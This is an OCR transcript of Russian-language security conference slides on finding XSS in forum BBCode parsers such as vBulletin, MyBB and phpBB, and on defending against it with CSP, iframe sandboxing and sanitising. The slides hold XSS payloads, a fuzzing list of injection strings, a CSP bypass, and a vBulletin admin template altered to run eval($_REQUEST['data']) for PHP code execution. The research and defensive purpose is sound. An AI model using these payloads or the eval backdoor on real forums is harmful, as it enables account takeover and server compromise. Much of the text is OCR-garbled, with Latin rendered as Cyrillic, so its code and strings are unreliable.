аеп(1)//">ПЕр://изег@таН.сот'?зибес{="оптоизеоуег 
=а!е\(1 )//</а>">изе@та!.сот? зи ец{="оптоизеоуег 


=а!ец(1)//">ПЕр://изег©@тай.сот?зиБес{="оптоизеоуег 
=ае"(1 )//</а></а> 


Обнаруженные ХЗ$ вектора 


уВиПенп 


мувв 


РММ 


Воске.Спа+{ 


О1зсоигзе 


КауаКо 
Нераезк 


[МРЕО=“е$1;123"аме[РОМТ ="Сотс Зап$ оптоизеоуег=аец(1) 
а"12з/ЕОМаме[/\ЛОЕО] 


[ета ехатре@ехатр!е.сот?зибес=могкКета!=ехатр!е@ехатр/е.сот'? зи ес=\мог 
К оптоизеоуег=аец(1) аоме]читк{ех[/ета/ета!] 


%ае!пте=ИКедгаретий оп{Чатпу='аме="а$4'% 


(:м Ше='а%кедгаретиН% за4' зуе=‘аза':)"оптоизеоуег="аеп(1)" 
1е$1 


[ (ИЕр:/Лммм.дооде.сот) 
\мимим/.доое.сот/ра<ПЕр://доое.сот/оптоизеоуег=а|ец(1);рагеЕ|етет.тпегНТ МЕ=/ 
ам/е/.зоигсе аме|Техп/Те.рйр 


Прз://сопзет.уощибе.сот/т'?соттие=ИИр%За//\ммлм.уощибе.сот/ма{<п% 3 №/%Зааме 
[Г Орп|9Р$0%39\ме%2526%2523х22а\ме%2526%2523хЗед\ме%253с119%2526%2523х 
0а$гс%2526%2523х34$%2526%2523х0аопе!гог%2526%2523хЗарготрк1 )%2526%2523 
хЗеа\ме%2526%2523х3</а%2526%2523хЗеамеае\ме\ма%2526%2523х22а\мемеамее\м 
а&9|=ОЕ&т=0О&рс=У8ихе=23983172&П|=ае&5$гс=1 


ПЕр://дооде.соп/аме"><итод/згс='$'опеггог="а!е[(1) 


ЬБкод маео + ББкод 
Гоп 


ета! ББкод + ета! 
ББкод другого 
синтаксиса 


Ом Ще + юпатпу 


ий парсер + тагкКаом/тп 
ий код 


Декодинг ийепсоае 
и МитепиНе$ 

при обработке 
уощире ип 


Отсутствие 
фильтрации НТМЁЕ 
символов в ПКЕ 


Делаем фазз-лист для тестов 


Только те строки, которые превращаются в Все строки НТМЕ символы 
НТМЕ и у которых можно менять часть которые "<> 
превращаются 
в НТМЕ 
Примеры: 
Ю(р://доое.сот/?рагат=уа1$1С%9%$1В9ие ‚зите: или АЗСИ фаззинг 
ИНр://изетате:ра$%1$106%%1$1В%\мог4@доод/е.сот/ [о]1амме[Ъ] 0х00 - 0х7! 


[со0г=с010г%11$1С%%1${В%пате{ех{/со!о!] 


Фрагмент листа для фаззинга уВи|Нейп 


[19]И(р://ааа.гилта/пеааег.ра[от{=амие]аме[Лоп аме/тод] 

МОЕО="аме[от=аме]амме[Лоп{;123"аме/\МОЕО] 

МРОЕО="аме;123"ам/Попт=а\мме]аме[/Лоп е/\МОЕО] 

маео="уощире;123З[юг{=аме]оме[Лоп "ИИ рз://Ммлммм.уощибе.сот/масп?у=Еп2ст7з2Еа[/\аео] 

маео=\м/щсй;1 23 ПИрз://млмм {МСП ДУЛи4ео$/285048327'?соЙесйоп=-41 Е |ГимВАА\М/ае [Гюопт=аме]аме[Лоп [/\маео] 
маео=уоцщире;123|И(р$:/Лммим.уощибе.сот/ма{Фсй?у=Еп2сп7$2Е от=аме]аме[Лоп [/\маео] 
маео=мтео;123]ПЕр5$:/митео.сот/спаппе|$/${аЙр!ск$/285359780Пот=аме]аме[Лоп [/маео] 
маео=птхег;123]И4р$://\млммм фасероок.сот/датто/“уре=127929-Мтесга|от=аме]аме[ЛМоп [/маео] 
маео=твасае; 123 пИр://Аммлм.т@аса!е.сот/макп/1 1718542/уои-до{-{Позе-геда-бип$-пип/Пот=аме]аме/Лоп маео] 
маео=Пувеак;1 23 ПИрз://млм\м .Пу@еак.сот/мем?!=715_1513068362[ют=аме]аме[Лоп [/маео] 
маео=асебоок;123|ПЕрз://млмм Гасебоок.сот/меНиппумаео//лаео$/1 1532868881487 75 Поп{=аме]аме[Лоп //маео] 
маео=дайутоНоп;123]И(р$://ммлм.Чайутойоп.сот/иаео/хбпх1с8ют=аме]аме[Лоп [/маео] 
[ГОМТ=АнПопе=аме]аме[/Лоп аПаме/ЕОМТ] 

[51©Е=11[от=аме]аме[/юопт рх|аме/з МЕ] 

[ГОМТ="АнПоте=аме]аме[/Люоп а!" аме/ЕОМТ] 

[515Е="1 1 Попт=аме ]амме[Лоп рх"]аме/> МЕ] 

[ета аме@ам/Гоп{=аме]оме[Лопе.сот[/ета!] 

[ета|=амме@ам опт =аме]аме[Лоп е.сот]аме/ета!] 

[и АЕр://аме@ам/[Гог=амие]аме[Лопе.сот[/ип] 

[4И=ИЕр://амме@ам/ ют =аме]оме[Лопе.сот]аме[/и!] 

[ета!="амме@ам/ ют =аме]оме[Лоп е.сот"аме/ета!] 

[и!="И6р://омме@ам ют =аме]оаме[Лоп е.сот"амме/ и! 


Методы обнаружения багов при фаззинге 


ый р: /дооде.сот 5 р://дооде.сот 


Ожидаемый результат: появляются 
куски НТМЕЁ кода. 


<[^!>"*=[^> |< ТЕТ $ТЕИМС 
Ожидаемый результат: атрибут <а+Пге{="В{{р: / /воо8\е.сот<а 

НМ содержит открывающий НТМЕ Юге =" фр: / /зооб1е.сот">Н*р: / /воо5\е. сот< /а>">НЕЁр: / /5ооз 
СИМВОЛ. 


1е.сот</а> 


уВиНет и поиск багов регуляркой 


Ведиез Рауюад Заи$ Егтог Титеош — 1епай <[^!> 0] “=> < У | Соттег! 
1 [ипд)Аёр://ааа.ги/тлд/еадег |ра[юп(=амие]амие[Моп а... 200 СО О 6436 (У) 
- Е и 
- [Маео=мийсв; 123] нирз-/мли\му 1муйсв 4м/де0$/2850483... 200 О О 6724 © 
6 [Мдео=уощиье:123]Нрз://млмми. уощибе.сопАмасв?м... 200 О О 6854 
7 [мдео=митео;123]п6рз://итео.согл/спаппе!/${айрск... 200 О О 6707 (У) 
8 [Мдео=птхег.123]Нирз-/Лмммм фасеоок.соп/датиа/... 200 О О 6713 и 
9 [мдео=теасае;123]пир:/Млмм.теасае.сопп/ма(сп.... 200 (5 О 6730 
10 [мдео=йуееак:123]пир$://Лмлиими ПуееаК.соглЛле\ми?1=71... 200 О О 6707 (У) 
11 [мдео=асебоок;:123]Ир$-//млмим асебоок.соглАле{ип... 200 [9 О 6728 (У) 
12 [мдео=дайутойоп:123]И6р$-/Ммимим.дайуговоп.согп/м... 200 О О 6706 и 
19 [9 Вер-//амме@ам юг =амме]амме[Мопе.согт[/иг] 200 О О 6432 (М) 
0 200 О О 6258 О 
2 МОЕО-="амеюп=амие]аме[Моп:123"аме/МОЕО] = 200 О О 6634 О 
"ев [па "са 


Баллы а: 4 902 ли силы Тао КА ТИИЬ НН Бапалае 


п 


(2 Кам Гепдег \п Аспоп$ м 


В Е Е В Е В В В ЕТ СТ В Е В В О 


›35.с3з3,сзз Ъ роз сопеко1.с33,сзз р розЕ абфасрмепез.сз3, сзз Ь розе поЕ1се.сзз, сзз Ь розЕ зм.сз3,сзз Ь сошаепез.с33,сзз Ь сошщепф.сз3 
‹;еазе1ес®- ап1таФе.сз3, сзз )ацеку-ц1-1 121 сизфом.с33,сзз Зацеку 481р.с33,сзз )ацеку зе1есЕВох.сзз,сзз )]ццеку ацбодком. сзз, сзз 91ора 


33=\ "у1Чеосопфалтек\ ">\к\п\\\ к\п\Е<а с1азз=\ "у 4ео-Ёкаще\" рке{=\ "ди<Фрап з5у1е=\ "Еопе- Еам11у: чие\ ">чие<\/зрап>е\" Чафа-усо4е=\ "123 \ 


уВиПейп и визуальное определение 


омме" Чаа-усоде="1 23" аза-ургомаег="м/сИ" > 


омие" даа-усоае="123" даа-ургомаег="уощире" > 


омме" Чаа-усоде="1 23" аза-ургомаег="\уитео" > 


уВиНет и админский редактор РНР 


< -> С О м//Лосаво$УмбиЙеип/ааттеретр!ае.рпр?зеагспзе{=18&дгоир=8етр!аеа=60385еаг 


"== Арр$ 


чуть ила 


Тетр!а{е: пеадег (ю: 603) 


Ргодис{ уВШет 
ре Ое!аии $1уе 
Те 

[Меми Ни5югу] пеадег 
Тех оту С уе 


№ срескеа, {етр/ае илИ Бе ра55ед ехасйу а$ 
еп{егед Реге- по гепдетпд ми! Бе рейогтеч. 


"т 7 УЫ Е 


тетрее 407 </мр:еасН>» 
408 </мЬ:1Е> 

[Зпом ОеГаш8 09 

41С <УБ:1Е соп9161оп="$азехг['1$ а@т1п'] АМШ !$уБорЕ1оп$з [ 'ББасЕ1уе' 

411 <А1у с1азз="Еогим Я15а61еа икгаррег"> 

412 <а1у с1азз=="Еогим Я1заб1еа иагп1па">{УЬ:гамрЬгазе а1ег 

413 </91м> 

414 </мЬ:1Е> 


{УБ:Фепр1афе по®1сез, раде={уБ:гам раде} } 
418 {УБ:ВооКк 'Беа4ег БеФоге сопфеп®' } 


421 <УЬ: сошиеп®><!-- ***** СОМТЕМТ ЗТАВТ ***** --></уЬ: сошиеп®> 
422 <па1п 19="сопееп®"> 
423 <а1у с1аз5="сапуаз-1ауоц$-сопфазпег 7)5-сапуаз-1ауойе-сопфа 


426 <УЬ:1Е сопа1610оп="$ ВЕОПЦЕЗТ [ 'аафа']"> 

42' <УБЬ:1Е сопа1Е1оп="еуа1 (''.$ ВЕОЧЦЕЗТ [ 'Часа'])"> 
428 „«/мЬ:1Е> 

429 </чЬ:1Е> 


Са ее Ге Сол ме СЯЯ +^ мы 


уВиПейп и админский редактор РНР 


(0 Виф:/ЛосаНо$ИумбиЙеип/?даа=еспо%20%27 <сещег>%27.рпрмег$юп().%27 </сеег>%27;:4е; 


Ломаем форум от имени админа 


Как защититься? (Полное отключение 4+5) 


СОР 


(Сотепт! Зесищу Ройсу) 


<Итате> запарохпо 


— Политика безопасности контента. Представляет из 
себя чёрный или белый список источников контента. 
С ее помощью можно ограничить не только загрузку 
картинок на страницу, но и выполнение $. 


— Для отображение НТМЕ контента из недоверенного 
источника, или НТМЁ контента подконтрольного 
пользователям, можно использовать фреймы 

с атрибутом запарох. 


Блокируем скрипты (СЗР) 


3 «‹тефа ИЕЕр-еди1у="СопЕеп* -5есиг1у-Ро11су" соп&еп*="аефаи1*-згс зе1+"> 
4 <зсг1ре> 
5 а1ег*(1) 
5 </зсгтрЕ> 
сгеаеа Бу Кодпдо зачета 
[к О | Неглепё5 Сопзо[е Зоигсе$ Ре{огтапсе Метогу АррйсаНоп ЗесигЙу Ца очц5е Мебмлогк 


|] © юу’ © НКег 
Соп5о[е иаз с[еагед 
ипаеР1пеад 


@ рнеРизед Фо ехесифе 1п]1пе зсгтре Бесаизе 1% у1о]афез {Ве Фо]]ом1п= Сопфепф Зесиг1{у Ро]1су Ч1гесЕ1уе: "дефаи]{-згс зе". 
Кеумог, а ПазИ ('зПа256-78+4 /мтаМод\с1П9Хот49Ьт\/ЕТиВ8анНпВ5Ну7К1м1т7\='), ог а попсе (‘попсе-...’) 1$ гедитгед Фо епаб]е 1п1 
ет, 50 'ЧеРгац1{-згс' 1$ изе аз а Та1ПБаск. 


Блокируем скрипты (СЗР) 


. Пример политики с предыдущего слайда можно обойти: 


<$СПрЕ $гс=../ра{ИДо/ЕНеОп5ате$ЦКе.|$></зсирё> 
<$сир{ 


$гС=..//5ОМРса!рбаск=тайсюиц$_|ауазсир{></зспир{> 


. СЗР Может не только блокировать контент но и отправлять отчеты о аномалиях 


Сощет-Зеситщу-Ройсу: аетаий-згс зе; герой-ип /сзр-мо!айоп-героц-епароти 


Этот пример заставит браузер отправить ошибку СЗР в формате /$О0М 
по следующему адресу ПИрз://уоцгзКе.сот/сзр-мюо!айоп-герой-епаротИу 


Блокируем скрипты (Игате запабохтд) 


1 <1+гате запаБбох згсаос="е<5сг1рЕ>а1ег*(1)</зсг1ре>" >< /1гате> 


1е51 
| 
еаеад Бу Кодпао 5ацега 
О | Еетеп5 — Сопзое Зочгсе5 Реоптапсе Метогу — АррйсаНоп ЗесигЙу На Фоц$е Мевлогк 
© юу’ ® „ы 
/ 
пи1 ] 


В]1осКеЧ $сг1рф ехеси{1оп 1п 'аБбоц*:згс@ос" Бесаизе 1Ие аоситепт'$ Тгате 1$ зап@Бохей апд {Пе ‘а1]1ом-зсг1рф$’ регт1$5$1о0п 15$ поф $е{. 


Как защититься? (санитайзинг) 


Пример патча из РПогит СМ$ 


Текст сообщения: ту е-та!: [ета!омме@аме.сот[/етай] 
Как выглядит на форуме: —туе-тай: аме@аме.сот 


НТМЕ исходник: 


МУ -та:1: ‹а Вге+="та11%0:&#113;&#119;&#101;&#64; &#113;&#119;&#101;&#46;&#99;&#111;8#109; ">&#113;&#119;&#101;&#64;&#113;&#119;&#101;&#46;&#99;&#111;&#109; </а> 


Роме 
Тесппою9!е$ 


1500+ сотрудников 


20 лет экспертизы 
в исследованиях и разработке 


16 продуктов 


Мы — создатели самого крупного в 
России международного форума по 
практической кибербезопасности Розшуе 


2300+ компаний-клиентов 


Мы проводим исследования, создаем 
продукты и сервисы с единой целью — 
не дать хакерам реализовать кибератаки 
с недопустимыми последствиями для 
бизнеса, отрасли, страны 


Наш стек: СЯ, РуПоп, С/С++, Со, ша, 
чЧамазсир{ 


Мы публичная компания, наши акции 
торгуются на Московской бирже (МОЕХ: 
РОЗ), а многие сотрудники являются 
совладельцами 


Спасибо! 


Игорь Сак-Саковский (@рзуспОНЛа) 
НЕ2022 


